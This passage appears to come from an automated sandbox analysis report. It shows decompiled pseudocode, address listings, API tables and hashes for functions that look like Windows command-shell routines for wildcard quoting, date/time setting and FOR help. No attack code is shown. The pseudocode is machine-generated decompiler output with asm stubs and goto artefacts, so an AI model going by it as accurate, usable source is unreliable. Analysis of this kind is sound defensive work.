                                                • Part of subcall function 002ACD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,002C9362,00000000,00000000,?,002B9814,00000000), ref: 002ACD55
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                              • String ID: \\.\
                                              • API String ID: 52035941-2900601889
                                              • Opcode ID: 6747e3517b0065bdde13f2dea21c4b6d5be242860c692e2cb8d772fe66b7cc78
                                              • Instruction ID: 6ac6317b89bcd743d5594d668dce2a53911d2e2e3ad968b23073b0a6dd3ab4dd
                                              • Opcode Fuzzy Hash: 6747e3517b0065bdde13f2dea21c4b6d5be242860c692e2cb8d772fe66b7cc78
                                              • Instruction Fuzzy Hash: 7D41F4715243529BD7209F24E989AABB7E8EF86750F00092EF845C7192EF70D964C6A3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CAEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E002CAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E002CB4DD(0);
				_t157 = 0x2c;
				_t191 = E002B00B0(_t157);
				if(_t191 == 0) {
					E002C9287(_t157);
					__imp__longjmp(0x2db8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E002ACB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E002B3B5D(_t159,  &_v124) == 1) {
					L57:
					E002B5D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E002B4800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E002B5590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E002C9C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x2e853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x2e853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x2e853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E002B0040(_t154[0xc]);
								E002B0040(_t154[2]);
								E002B0040(_t154);
								E002B5D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E002B6FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}













































































                                              0x002caef0
                                              0x002caef7
                                              0x002caefd
                                              0x002caeff
                                              0x002caf08
                                              0x002caf10
                                              0x002caf15
                                              0x002caf19
                                              0x002caf1c
                                              0x002caf1f
                                              0x002caf22
                                              0x002caf25
                                              0x002caf28
                                              0x002caf2b
                                              0x002caf2e
                                              0x002caf31
                                              0x002caf34
                                              0x002caf37
                                              0x002caf3a
                                              0x002caf3d
                                              0x002caf43
                                              0x002caf44
                                              0x002caf45
                                              0x002caf46
                                              0x002caf4a
                                              0x002caf50
                                              0x002caf53
                                              0x002caf56
                                              0x002caf59
                                              0x002caf5c
                                              0x002caf5f
                                              0x002caf62
                                              0x002caf63
                                              0x002caf64
                                              0x002caf65
                                              0x002caf6c
                                              0x002caf72
                                              0x002caf76
                                              0x002caf78
                                              0x002caf84
                                              0x002caf84
                                              0x002caf8d
                                              0x002caf92
                                              0x002caf9b
                                              0x002caf9d
                                              0x002cafa0
                                              0x002cafa5
                                              0x002cafaa
                                              0x002cb2a5
                                              0x002cb2a5
                                              0x002cb2aa
                                              0x002cafbe
                                              0x002cafc1
                                              0x002cafd1
                                              0x00000000
                                              0x002cafd7
                                              0x002cafd9
                                              0x002cafe3
                                              0x002cafe8
                                              0x002cafef
                                              0x00000000
                                              0x002caff5
                                              0x002caff8
                                              0x002cb007
                                              0x002cb00d
                                              0x002cb00d
                                              0x002cb012
                                              0x002cb015
                                              0x002cb019
                                              0x002cb01c
                                              0x002cb01e
                                              0x002cb01f
                                              0x002cb01f
                                              0x002cb025
                                              0x00000000
                                              0x00000000
                                              0x002cb02a
                                              0x002cb066
                                              0x002cb068
                                              0x002cb068
                                              0x002cb071
                                              0x002cb074
                                              0x002cb077
                                              0x00000000
                                              0x002cb02c
                                              0x002cb02c
                                              0x002cb032
                                              0x002cb036
                                              0x002cb03c
                                              0x002cb040
                                              0x002cb043
                                              0x002cb043
                                              0x002cb04b
                                              0x002cb04f
                                              0x002cb051
                                              0x002cb078
                                              0x002cb078
                                              0x002cb07a
                                              0x002cb07c
                                              0x002cb07c
                                              0x002cb04f
                                              0x002cb088
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002cb088
                                              0x002cb08c
                                              0x002cb08f
                                              0x002cb092
                                              0x002cb098
                                              0x002cb09e
                                              0x002cb0a4
                                              0x002cb0ad
                                              0x00000000
                                              0x002cb0b3
                                              0x002cb0b5
                                              0x002cb0bb
                                              0x002cb0bd
                                              0x002cb0c2
                                              0x002cb0c8
                                              0x002cb0cb
                                              0x002cb0d3
                                              0x002cb0d6
                                              0x002cb0d8
                                              0x002cb0d8
                                              0x002cb0de
                                              0x00000000
                                              0x00000000
                                              0x002cb0e3
                                              0x002cb0fa
                                              0x002cb0fa
                                              0x002cb0e5
                                              0x002cb0e5
                                              0x002cb0e9
                                              0x002cb0ed
                                              0x00000000
                                              0x002cb0ef
                                              0x002cb0ef
                                              0x002cb0f2
                                              0x002cb0f8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002cb0f8
                                              0x002cb0ed
                                              0x002cb103
                                              0x002cb105
                                              0x002cb10b
                                              0x002cb110
                                              0x002cb112
                                              0x002cb112
                                              0x002cb118
                                              0x00000000
                                              0x00000000
                                              0x002cb11d
                                              0x002cb134
                                              0x002cb134
                                              0x002cb136
                                              0x002cb11f
                                              0x002cb11f
                                              0x002cb123
                                              0x002cb127
                                              0x00000000
                                              0x002cb129
                                              0x002cb129
                                              0x002cb12c
                                              0x002cb132
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002cb132
                                              0x002cb127
                                              0x002cb141
                                              0x002cb143
                                              0x002cb149
                                              0x002cb14c
                                              0x002cb14c
                                              0x002cb14f
                                              0x002cb152
                                              0x002cb157
                                              0x002cb15f
                                              0x002cb163
                                              0x002cb16f
                                              0x002cb175
                                              0x002cb183
                                              0x002cb188
                                              0x002cb18e
                                              0x002cb193
                                              0x002cb29a
                                              0x002cb199
                                              0x002cb19f
                                              0x002cb1a2
                                              0x002cb1a8
                                              0x002cb1ae
                                              0x002cb1b0
                                              0x002cb1b2
                                              0x002cb1c2
                                              0x002cb1c4
                                              0x002cb1c4
                                              0x002cb1c8
                                              0x002cb1cb
                                              0x002cb1ce
                                              0x002cb1d0
                                              0x002cb1d5
                                              0x002cb1d8
                                              0x002cb1de
                                              0x002cb1de
                                              0x002cb1e4
                                              0x002cb1e4
                                              0x002cb1f0
                                              0x002cb1f5
                                              0x002cb1f9
                                              0x002cb1fa
                                              0x002cb1fd
                                              0x002cb1fd
                                              0x002cb200
                                              0x002cb20a
                                              0x002cb218
                                              0x002cb220
                                              0x002cb22b
                                              0x002cb230
                                              0x002cb233
                                              0x002cb236
                                              0x002cb23a
                                              0x002cb23e
                                              0x002cb23f
                                              0x002cb242
                                              0x002cb253
                                              0x002cb253
                                              0x002cb258
                                              0x002cb25e
                                              0x002cb261
                                              0x002cb261
                                              0x002cb188
                                              0x00000000
                                              0x002cb143
                                              0x002cb13a
                                              0x002cb13c
                                              0x002cb13f
                                              0x00000000
                                              0x002cb13f
                                              0x00000000
                                              0x002cb105
                                              0x002cb0fe
                                              0x002cb100
                                              0x00000000
                                              0x002cb264
                                              0x002cb264
                                              0x002cb265
                                              0x002cb268
                                              0x002cb0c8
                                              0x002cb277
                                              0x002cb27f
                                              0x002cb286
                                              0x002cb28b
                                              0x002cb290
                                              0x002cb290
                                              0x002cb0ad
                                              0x002cafef
                                              0x002cafd1
                                              0x002cb2bc

                                              APIs
                                                • Part of subcall function 002CB4DD: free.MSVCRT(?,0000000A,00000000,?,002C35C4), ref: 002CB4FB
                                                • Part of subcall function 002CB4DD: free.MSVCRT(?,0000000A,00000000,?,002C35C4), ref: 002CB508
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • longjmp.MSVCRT(002DB8B8,00000001,00000000,?,00000000), ref: 002CAF84
                                              • qsort.MSVCRT ref: 002CB007
                                              • wcschr.MSVCRT ref: 002CB05C
                                              • calloc.MSVCRT ref: 002CB09E
                                              • calloc.MSVCRT ref: 002CB16F
                                              • wcschr.MSVCRT ref: 002CB1B8
                                              • memcpy.MSVCRT ref: 002CB20A
                                              • memcpy.MSVCRT ref: 002CB22B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 975110957-381716982
                                              • Opcode ID: ff369b3abd72a2a3e832b15e54e4901e59e58aa7b2a84926de342148d30ac070
                                              • Instruction ID: 8debb3f9b9dff29c69e5a6ebe8ad329486640e8036db9bb62a728fe090fd92d0
                                              • Opcode Fuzzy Hash: ff369b3abd72a2a3e832b15e54e4901e59e58aa7b2a84926de342148d30ac070
                                              • Instruction Fuzzy Hash: 64C1E032A202158BDB259F68DC42BAEB7B1FF45710F14416EE848EB382EB709D51CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C3CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245timeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 45%
                                              			E002C3CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x2cf81c;
					E002B1040( &_v34, 0xd, 0x2cf7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E002B18C0( &_v40, 0x10, 0x2cf80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x2cd540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E002AC108(_t91);
									_t129 = _t128 + 8;
								} else {
									E002AC108(_t91, _t44, 1, 0x2cf80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E002C3B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E002B0178(_t51) == 0) {
											_push( &_v604);
											E002B25D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E002AC108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E002B6FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E002B1040( &_v604, 0x105, _t88);
								L35:
								E002B1040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E002AEA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E002C4159( &_v620, _t113);
									} else {
										_t61 = E002C3FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E002AC108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E002AC5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}









































                                              0x002c3cd2
                                              0x002c3cd9
                                              0x002c3cde
                                              0x002c3ce0
                                              0x002c3ce5
                                              0x002c3d3b
                                              0x002c3d48
                                              0x002c3d4f
                                              0x002c3d53
                                              0x00000000
                                              0x002c3ce7
                                              0x002c3ce7
                                              0x002c3cef
                                              0x002c3cf4
                                              0x002c3cf7
                                              0x002c3d01
                                              0x002c3d08
                                              0x00000000
                                              0x00000000
                                              0x002c3d0a
                                              0x002c3d0d
                                              0x002c3d10
                                              0x002c3d13
                                              0x00000000
                                              0x00000000
                                              0x002c3d1b
                                              0x002c3d1b
                                              0x002c3d1e
                                              0x002c3d20
                                              0x002c3d23
                                              0x002c3d2e
                                              0x00000000
                                              0x002c3d58
                                              0x002c3d58
                                              0x002c3d5a
                                              0x002c3d98
                                              0x002c3d9d
                                              0x002c3da0
                                              0x002c3db5
                                              0x002c3da2
                                              0x002c3da5
                                              0x002c3dae
                                              0x002c3da7
                                              0x002c3da7
                                              0x002c3da7
                                              0x002c3da5
                                              0x002c3dbc
                                              0x002c3dd0
                                              0x002c3dd2
                                              0x002c3dd7
                                              0x002c3ddc
                                              0x002c3dbe
                                              0x002c3dc6
                                              0x002c3dcb
                                              0x002c3dcb
                                              0x002c3ded
                                              0x002c3df3
                                              0x002c3df6
                                              0x002c3e05
                                              0x00000000
                                              0x002c3e0b
                                              0x002c3e0b
                                              0x002c3e13
                                              0x00000000
                                              0x00000000
                                              0x002c3e1b
                                              0x002c3e23
                                              0x002c3e29
                                              0x002c3e33
                                              0x002c3e59
                                              0x002c3e62
                                              0x002c3e6a
                                              0x002c3e70
                                              0x002c3e75
                                              0x002c3e75
                                              0x00000000
                                              0x002c3e62
                                              0x002c3e35
                                              0x002c3e38
                                              0x002c3e44
                                              0x002c3e48
                                              0x002c3e4b
                                              0x002c3e50
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3e52
                                              0x002c3e54
                                              0x002c3e56
                                              0x00000000
                                              0x002c3e56
                                              0x002c3d62
                                              0x002c3d62
                                              0x002c3d64
                                              0x002c3d64
                                              0x002c3d67
                                              0x002c3d67
                                              0x002c3d6a
                                              0x002c3d6d
                                              0x002c3d74
                                              0x002c3d7c
                                              0x002c3f94
                                              0x002c3f96
                                              0x002c3fa1
                                              0x002c3fa2
                                              0x002c3fa7
                                              0x002c3faa
                                              0x002c3faa
                                              0x002c3faf
                                              0x002c3fbf
                                              0x002c3fbf
                                              0x002c3d8e
                                              0x002c3e78
                                              0x002c3e84
                                              0x002c3e89
                                              0x002c3e8e
                                              0x002c3e97
                                              0x002c3e9d
                                              0x002c3ea0
                                              0x002c3ea3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3ea3
                                              0x002c3eb0
                                              0x002c3eb2
                                              0x002c3eb6
                                              0x002c3efe
                                              0x002c3f00
                                              0x002c3f0e
                                              0x002c3f14
                                              0x002c3fd0
                                              0x002c3fd0
                                              0x00000000
                                              0x002c3fd0
                                              0x002c3f21
                                              0x002c3f2a
                                              0x002c3f2c
                                              0x002c3f32
                                              0x002c3f35
                                              0x002c3f3e
                                              0x002c3f37
                                              0x002c3f37
                                              0x002c3f37
                                              0x002c3f45
                                              0x002c3f72
                                              0x002c3f76
                                              0x002c3f78
                                              0x002c3f82
                                              0x002c3f83
                                              0x002c3f88
                                              0x002c3f8b
                                              0x00000000
                                              0x002c3f47
                                              0x002c3f4e
                                              0x002c3f63
                                              0x00000000
                                              0x00000000
                                              0x002c3f70
                                              0x002c3fc0
                                              0x002c3fc8
                                              0x002c3fc9
                                              0x00000000
                                              0x002c3fc9
                                              0x00000000
                                              0x002c3f70
                                              0x002c3f45
                                              0x002c3ec0
                                              0x002c3ec3
                                              0x002c3ec5
                                              0x002c3ef6
                                              0x002c3ef6
                                              0x002c3ef9
                                              0x002c3efb
                                              0x00000000
                                              0x002c3efb
                                              0x002c3ecc
                                              0x002c3ed1
                                              0x002c3ed7
                                              0x002c3edb
                                              0x002c3ee2
                                              0x00000000
                                              0x00000000
                                              0x002c3ee4
                                              0x002c3ee7
                                              0x002c3ee8
                                              0x002c3eeb
                                              0x002c3eee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3ef0
                                              0x002c3ef4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3ef4
                                              0x002c3d5a
                                              0x002c3d58
                                              0x002c3d19
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c3d19

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002C3DED
                                              • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 002C3F21
                                              • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 002C3F4E
                                              • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 002C3F5B
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 002C3F65
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 002C3FC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: LocalTime$ErrorLast$_get_osfhandle
                                              • String ID: %s$/-.$:
                                              • API String ID: 1033501010-879152773
                                              • Opcode ID: fddf5f75a571511dd90127d0342504fe933b7419138ed95b1058de7352c8ce18
                                              • Instruction ID: 4f8a1ab91373a3af3fc146bfa5d6bf632cb757e0df58384b1a51aba5da7e9e20
                                              • Opcode Fuzzy Hash: fddf5f75a571511dd90127d0342504fe933b7419138ed95b1058de7352c8ce18
                                              • Instruction Fuzzy Hash: 7181F531A2021687DB24DE68CC4AFEA3365AF45300F148B6DE806EB594EAB59F65CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A9A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 50%
                                              			E002A9A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x2dfaa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x2dfaa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x2dfa8c = 0x1e;
				_t101 = E002AE9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x2dfaa0 = _t31;
					_t32 = 0x3f;
					 *0x2dfaa2 = _t32;
					 *0x2dfaa4 = 0;
